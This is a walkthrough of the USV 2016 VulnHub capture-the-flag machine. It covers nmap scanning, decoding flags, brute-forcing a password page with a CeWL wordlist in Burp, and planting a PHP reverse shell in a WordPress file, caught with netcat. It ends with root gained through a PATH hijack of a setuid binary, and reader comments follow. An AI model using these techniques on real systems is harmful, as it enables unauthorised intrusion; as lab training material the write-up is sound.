USV: 2016
Location
https://download.vulnhub.com/usv-2016/USV-CTF.ova
Introduction
Instructions: The CTF is a virtual machine and has been tested in Virtual Box. It has all required drivers if you want it to run on VMware or KVM (virtio). The network interface of the virtual machine will take it`s IP settings from DHCP.
Flags: There are 7 flags that should be discovered in form of: Country_name Flag: [md5 hash]. In CTF platform of the CTF-USV competition there was a hint available for each flag, but accessing it would imply a penalty. If you need any of those hints to solve the challenge, send me a message on Twitter @gusu_oana and I will be glad to help.
About: CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenges creation, evaluation of results and building of CTF environment was provided by Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)
Getting Started
Starting with a nmap scan.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-28 21:27 CET
Nmap scan report for 192.168.171.3
Host is up (0.00088s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.3 (protocol 2.0)
| ssh-hostkey:
| 2048 d8:b9:dd:8e:e7:d1:95:52:2c:98:bf:e0:65:7a:b0:92 (RSA)
|_ 256 08:03:90:eb:24:5b:dd:67:f9:1f:4d:1e:60:93:a7:e3 (ECDSA)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Access forbidden!
3129/tcp open http-proxy Squid http proxy 3.5.22
|_http-server-header: squid/3.5.22
|_http-title: ERROR: The requested URL could not be retrieved
3306/tcp open mysql MariaDB (unauthorized)
4444/tcp open krb524?
| fingerprint-strings:
| NULL:
| HTTP/1.0 504 Gateway Timeout
| Pragma: no-cache
| Connection: close
| Content-Type: text/html; charset=utf-8
|_ <html><body>Connection to server <b></b> failed (Connection actively refused by the server.)<P></body></html> {600}
21211/tcp open ftp vsftpd 2.0.8 or later
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.40%I=7%D=12/28%Time=58642048%P=x86_64-pc-linux-gnu%r(N
SF:ULL,E1,"HTTP/1\.0\x20504\x20Gateway\x20Timeout\r\nPragma:\x20no-cache\r
SF:\nConnection:\x20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\
SF:r\n\r\n<html><body>Connection\x20to\x20server\x20<b></b>\x20failed\x20\
SF:(Connection\x20actively\x20refused\x20by\x20the\x20server\.\)<P></body>
SF:</html>\x20{600}\n");
MAC Address: 08:00:27:2B:64:55 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SevenKingdoms
TRACEROUTE
HOP RTT ADDRESS
1 0.88 ms 192.168.171.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.55 seconds
As a result I get a lot of open ports and services running on them. It seems there is SSH, HTTP, HTTP-proxy, MySQL, Kerberos and a FTP running on a registered port.
The host name is “SevenKingdoms” which is a reference to the TV show “The Game of Thrones”.
I’ll start and check if there is an interesting banner on the SSH server.
I get a nice picture and a encrypted or hash+salted string. After looking at the picture more closely I see that there is a hidden message. There are letters visible when combined spell out: AES ECB.
There are also characters visible near the tail. So I got an encryption suit, a key and a piece of cipher text.
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-128-ecb -d -a -k xxxxx0000000xxxxxx bad magic number ┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-192-ecb -d -a -k xxxxx0000000xxxxxx bad magic number ┌─[✗]─[n13mant@planetmars]─[~] └──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-256-ecb -d -a -k xxxxx0000000xxxxxx bad magic number
As this doesn’t give me the desired response, I try an online solution with more luck.
Italy Flag: 0047449b33fbae830d833721edaef6f1
Next stop is port 80. After browsing to the website I get a custom made error 403.
All the scans turn up with the same error 403. After I ran Nikto I got a result that directory /icons/ was accessible. Because there were a lot of pictures I could wget them all (in the hope one is altered), but because there are more leads to follow I write it down and continue the search.
When I run the website again, but this time through Burpsuite, I can see that there is a XSS protection in the server response in the form of a base64 encoded string.
Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
After a quick decode I get my second flag: Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb
There are more open ports. One is a squid proxy server on port 3129. After some reading I learned that squid is a web proxy cache server application which provides proxy and cache services for a whole list of services like HTTP. So my next step is to run my browser through that proxy and see if the website on port 80 will run.
With dirb I find a blog.
┌─[✗]─[n13mant@planetmars]─[~] └──╼ $dirb http://192.168.171.3/ -p http://192.168.171.3:3129 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Dec 29 11:45:49 2016 URL_BASE: http://192.168.171.3/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: http://192.168.171.3:3129 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.171.3/ ---- ==> DIRECTORY: http://192.168.171.3/blog/ + http://192.168.171.3/index.html (CODE:200|SIZE:3181) ---- Entering directory: http://192.168.171.3/blog/ ---- + http://192.168.171.3/blog/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.171.3/blog/wp-admin/ ==> DIRECTORY: http://192.168.171.3/blog/wp-content/ ==> DIRECTORY: http://192.168.171.3/blog/wp-includes/ + http://192.168.171.3/blog/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.171.3/blog/wp-admin/ ---- + http://192.168.171.3/blog/wp-admin/admin.php (CODE:302|SIZE:0) -----SNIP-----
After I browsed to the blog I found a few things that got my attention. One of them was a picture of Hodor with the text I have a message for you!.
After downloading it to my machine there was nothing to be found with exiftool or hexdump. But inside the folder where the picture resided there was something. A zipped file.
When I downloaded the file and extracted the picture that was inside, I got another view of Hodor. This time with my next flag. The string was part of the picture and not as metadata, so I used an online OCR scanner to get the string the easy way.
┌─[n13mant@planetmars]─[~] └──╼ $echo 'UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y=' | base64 -d Portugal Flag: a2663b23045de56c7e96a406429f733f
Next I proceed with the second interesting find on the website. A protected area for which I need a password. Because there is a lot of text on the website about “The Game of Thrones” I figure that the password could be somewhere in there. So I create a wordlist with Cewl.
┌─[n13mant@planetmars]─[~] └──╼ $cewl -d 2 -m 5 --proxy_host 192.168.171.3 --proxy_port 3129 -w ./Desktop/tgot.list http://192.168.171.3/blog/
To understand the process of the submitting of the password I followed the HTTP requests in Burp. When I enter a random password the process starts with a POST request followed by a GET request which has a cookie added to it. This cookie consists of the encoded password I entered.
So for me to successfully brute-force the password I need Burpsuite to follow the redirects and add given cookies.
With this password I get the next flag.
┌─[n13mant@planetmars]─[~] └──╼ $echo 'UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk=' | base64 -d Paraguay Flag: 4761b65f20053674657c7e6186628a29
On the same page there is a clue about a password.
At first I thought about the password and the possibility that the facial expressions showed a clue. But I’ve learned from previous challenges that the easiest explanation is often the best and the needed credentials are in plain sight. So I needed to interpret the text as literal as possible.
The “mother_of_dragons” has a password which is “in front of your eyes”.
With this credential I checked the leftover services running on the open ports. When I use it on the FTP server it let me in.
On the server there is a file called “readme.txt”. The content of this file is “I keep a hidden note for myself”. A hidden ‘note’. Like before the answer is in plain sight. The mentioned hidden note I found when browsing to “/.note.txt”
I always forgot passwords, so for my blog account I used my children`s name. -= Daenerys =-
No flag, but a good clue about the password needed for the admin part of wordpress blog.
The clue said “children’s name”, plural. So it could be her son or maybe the dragons as she sees them as her children.
Because there is a nice feature to let me reset the password I could figure out which username was the correct one. At first I thought it was “Daenerys”, but it seemed it was still “mother_of_dragons”. As for the correct password, it was a combination of all the dragon names that got me in.
After some browsing I found the next flag which was in the profile of the mother of dragons.
┌─[n13mant@planetmars]─[~] └──╼ $echo 'VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM=' | base64 -d Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733
To get a reversed shell I altered the search.php file and added the php reverse shell script from pentestmonkey to it. Next I opened up a listener on my end and pressed the search button to activate the shell script.
┌─[n13mant@planetmars]─[~] └──╼ $nc -lvnp 31337 listening on [any] 31337 ... connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 38870 Linux arch 4.8.8-1-ARCH #1 SMP PREEMPT Tue Nov 15 08:25:24 CET 2016 x86_64 GNU/Linux 07:58:47 up 11:45, 0 users, load average: 0.03, 0.06, 0.02 USER TTY LOGIN@ IDLE JCPU PCPU WHAT uid=33(http) gid=33(http) groups=33(http) sh: cannot set terminal process group (242): Inappropriate ioctl for device sh: no job control in this shell sh-4.4$ id id uid=33(http) gid=33(http) groups=33(http)
After searching inside the system I found the next flag.
[http@arch /]$ ls -lah ls -lah total 57K drwxr-xr-x 17 root root 4.0K Nov 7 20:39 . drwxr-xr-x 17 root root 4.0K Nov 7 20:39 .. lrwxrwxrwx 1 root root 7 Sep 30 2015 bin -> usr/bin drwxr-xr-x 4 root root 1.0K Nov 16 12:30 boot drwxr-xr-x 17 root root 2.9K Dec 28 20:13 dev drwxr-xr-x 51 root root 4.0K Dec 8 17:51 etc drwxr-xr-x 3 root root 4.0K Nov 16 15:44 home lrwxrwxrwx 1 root root 7 Sep 30 2015 lib -> usr/lib lrwxrwxrwx 1 root root 7 Sep 30 2015 lib64 -> usr/lib drwx------ 2 root root 16K Dec 5 2013 lost+found drwxr-xr-x 2 root root 4.0K May 31 2013 mnt drwxr-xr-x 2 root root 4.0K May 31 2013 opt dr-xr-xr-x 95 root root 0 Dec 28 20:13 proc drwxr-x--- 7 root root 4.0K Dec 28 20:13 root drwxr-xr-x 19 root root 600 Dec 28 20:13 run lrwxrwxrwx 1 root root 7 Sep 30 2015 sbin -> usr/bin drwxr-xr-x 4 root root 4.0K May 31 2013 srv dr-xr-xr-x 13 root root 0 Dec 29 08:01 sys drwxrwxrwt 2 root root 40 Dec 28 20:13 tmp drwxr-xr-x 8 root root 4.0K Nov 7 20:39 usr drwxr-xr-x 12 root root 4.0K Nov 7 19:58 var [http@arch /]$ cd srv cd srv [http@arch srv]$ ls -lah ls -lah total 16K drwxr-xr-x 4 root root 4.0K May 31 2013 . drwxr-xr-x 17 root root 4.0K Nov 7 20:39 .. dr-xr-xr-x 2 root ftp 4.0K May 31 2013 ftp drwxr-xr-x 3 root root 4.0K Nov 17 15:43 http [http@arch srv]$ cd http cd http [http@arch http]$ ls -lah ls -lah total 92K drwxr-xr-x 3 root root 4.0K Nov 17 15:43 . drwxr-xr-x 4 root root 4.0K May 31 2013 .. drwxr-xr-x 6 http http 4.0K Dec 4 06:01 blog -rw-r--r-- 1 root root 59K Nov 16 19:59 gtr.jpg -rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html -rw-r--r-- 1 root root 65 Nov 17 15:41 reward_flag.txt -rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger [http@arch http]$ cat reward_flag.txt cat reward_flag.txt TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ= [http@arch http]$ echo 'TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d <MxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d Mongolia Flag: 6b49c13cccd91940f09d79e142108394
There is a file called “winterfell_messenger” which is owned by root.
[http@arch http]$ ./winterfell_messenger ./winterfell_messenger cat: /root/message.txt: No such file or directory
When I run it I can see it tries to use the command “cat” and read a file called “/root/message.txt”.
[http@arch http]$ strings winterfell_messenger strings winterfell_messenger /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid system __libc_start_main __gmon_start__ GLIBC_2.2.5 UH-8 AWAVA AUATL []A\A]A^A_ cat /root/message.txt ;*3$" GCC: (GNU) 6.1.1 20160802 GCC: (GNU) 6.2.1 20160830 -----SNIP-----
So the “setuid” bit is set and the command “cat” is used with a relative path instead of an absolute path. To obtain root I’m going to create a file called “cat” which has as content “/bin/bash”.
The location of this file will be added to PATH so it will run my version of “cat”.
[http@arch http]$ echo "/bin/bash" > /tmp/cat echo "/bin/bash" > /tmp/cat [http@arch http]$ chmod +x /tmp/cat chmod +x /tmp/cat [http@arch http]$ echo $PATH echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin [http@arch http]$ export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin <p:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin [http@arch http]$ echo $PATH echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin [http@arch http]$ cd /srv/http cd /srv/http [http@arch http]$ ./winterfell_messenger ./winterfell_messenger [root@arch http]# id id uid=0(root) gid=33(http) groups=33(http)
After getting root it’s time to get the final flag.
[root@arch root]# /usr/sbin/cat .flag.txt
/usr/sbin/cat .flag.txt
,aa, ,aa
Congratulations! d" "b ,d",`b
,dP a "b,ad8' 8 8
d8' 8 ,8P'Y8a 8 8
d8baa8baP' `Y8a8
,adP"' Y,
,a8P" a `b
,aadP" (0 Y, 0 8
____________________________,,aaddPP""'8' I "a 8
,aad8PP"""""""""""""""""""""""""""""' 8, `b, "aP
,adP" "a "ba,. d888
,dP" "a, "a, `88'
a" "' `""8"'
d" ,8'
d" ,8'
8 ,a8'
8 b aP"
8 `b ,8"
(8 b, `b, a, dP'
I8 `8, `b d' ,aP"
8' `8, ,P d' ,a8P"
I8 "b ,8' ,8 ,d"d"'
,8' 8b ,dP""""""""""""""""Y8 ,d",d'
,d" d"8b ,dP' "b, ,P' d'
,d" ,d' dPb, ,dP' "b, 8' 8
d" ,d" ,d" 8 ,d"' `b P 8
d" ,d" ,d" ,d" ,d" 8 I 8
d" ,dP' ,d" ,d" ,d" 8 I 8
8, ,ad8P' ,d" (P' d" 8 8 8
"YP"'"8 ,8' Ib d" Y 8 8
8 d" `8 8 `b 8 Y
8 8 8, 8, 8 Y `b
8 Y, `b `b Y `b `b
Y, "ba, `b `b, `b 8, `"ba,
"b, "8 `b `""b `b `Yaa,adP'
"""""' `baaaaaaP `YaaaadP"'
U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==
┌─[n13mant@planetmars]─[~] └──╼ $echo 'U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==' | base64 -d Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34
Conclusion
A fun challenge with some nice features.
Could you please post exactly how to set up BURP SUITE — I’ve spent like 3 days going through different POST and GET and transitioning between what to define in the ADD portion and launching attacks to brute fore the password….I’m on the Secret Chapter page… But what should the Target IP and Port be, the Positions (what to define in the ADD), the Payloads (CEWL wordlist), and options. I’m getting 400’s and 403’s on both POST and GET – but joy on finding a 200 listing for the password.
I can get the Cookies and forwards from the webpage. I’m starting with the actual server refresh then re-doing the Settings in Ice Weasel to 127.0.0.1 8080 – and submitting a 1234 password to get a response. At some point, I changed it back to the USV server’s IP address and start new attacks…but nothing…
Many Thanks! J
Hi Jo.
In my write-up I’ve explained that you need to enable the options ‘follow redirections’ and ‘process cookies’.
The rest is normal procedure with a brute-force attack. You need to acquire the wordlist and run the attack.
As you can see in my example you will get a lot of code 200. But there is one thing that stands out from the rest. If you find that, you’ll find the password.
If you need more information on how Burpsuite works, this will be a great read: part 1 and part 2
Excellent – thanks. I just picked up the Burp Suite book off of Amazon…